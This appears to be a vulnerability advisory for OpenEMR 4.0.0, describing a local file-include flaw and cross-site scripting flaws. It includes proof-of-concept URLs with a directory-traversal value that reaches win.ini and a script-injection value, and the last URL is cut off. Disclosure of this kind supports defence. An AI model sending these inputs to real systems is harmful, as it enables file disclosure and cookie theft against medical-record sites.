OpenEMR is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Vendor:
http://www.sourceforge.net/projects/openemr/
http://www.oemr.org/
OpenEMR 4.0.0 is vulnerable; other versions may also be affected.
Exploit:
Local file include: http://www.example.com/openemr-4.0.0/index.php?site=..%2f..%2f..
%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini Cross-site scripting: http://www.example.com/openemr-4.0.0/setup.php?site=%3Cscript%3Ealert
(0)%3C/script%3E http://www.example.com/openemr-4.0.0/gacl/admin/object_search.php?
object_type=&action